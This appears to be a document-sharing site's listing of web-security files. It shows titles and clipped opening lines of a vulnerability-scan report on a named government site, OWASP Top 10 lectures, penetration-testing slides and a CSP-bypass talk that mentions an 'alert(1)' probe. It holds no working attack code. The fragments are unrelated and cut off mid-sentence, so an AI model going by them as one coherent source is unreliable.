Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06
Protocolo HTTP. Web and HTTP. HTTP overview. HTTP overview
Web and HTTP Protocolo HTTP Web page consists of objects Object can be HTML file, JPEG image, Java applet, audio file, Web page consists of base HTML-file which includes several referenced objects Each
WEB APPLICATION SECURITY USING JSFLOW
WEB APPLICATION SECURITY USING JSFLOW Daniel Hedin SYNASC 2015 22 September 2015 Based on joint work with Andrei Sabelfeld et al. TUTORIAL WEB PAGE The tutorial web page contains more information the Tortoise
Introduction to Computer Security
Introduction to Computer Security Web Application Security Pavel Laskov Wilhelm Schickard Institute for Computer Science Modern threat landscape The majority of modern vulnerabilities are found in web
Magento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
Web-Application Security
Web-Application Security Kristian Beilke Arbeitsgruppe Sichere Identität Fachbereich Mathematik und Informatik Freie Universität Berlin 29. Juni 2011 Overview Web Applications SQL Injection XSS Bad Practice
Security features of ZK Framework
1 Security features of ZK Framework This document provides a brief overview of security concerns related to JavaScript powered enterprise web application in general and how ZK built-in features secures
Web Application Penetration Testing
Web Application Penetration Testing 2010 2010 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Will Bechtel [email protected]
Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea
Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea Bypass: History Explanation: What Is Going On Process: Things To Look For Demos: alert(1) Done Live (hopefully) CSP: Content Security
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
